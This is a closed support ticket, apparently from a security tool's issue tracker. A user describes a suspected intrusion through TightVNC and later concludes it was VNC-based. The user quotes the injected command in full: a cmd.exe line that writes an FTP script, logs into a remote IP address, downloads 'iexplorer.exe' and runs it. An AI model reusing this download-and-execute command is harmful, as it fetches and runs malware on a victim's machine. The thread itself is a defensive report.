#134 Help with log, Possible infection.

v1.0_(example)
closed
None
5
2013-09-11
2013-09-03
David Hernandez
No

I had my computer on and i noticed it looked my computer was trying to type something so i opened notepad and got this

%systemroot%\system32\cmd.exe
del eq&echo open 181.73.36.174 7193 >> eq&echo user 20290 2634 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

unplugged from my internet, went safe mode, did multiple scans with kaspersky, maleware bytes, maleware bytes rootkit scanner and came up with nothing. I saw people saying it was a bypass with VNC (I was running TightVNC at the time with what i thought was a pretty secure password) anyway, its uninstalled and i want to make sure there is no damage.

Thank you.

1 Attachments

Discussion

    • status: open --> pending
    • assigned_to: Loucif Kharouni
     
  • I downloaded them and found nothing, I have come to the conclusion it was VNC based. After the shut down of my vnc server i have no gotten any weird happenings. Thank you for taking the time and looking through this.

     
  • perfect. Thanks for the update. I'll now close the case.

     
    • status: pending --> closed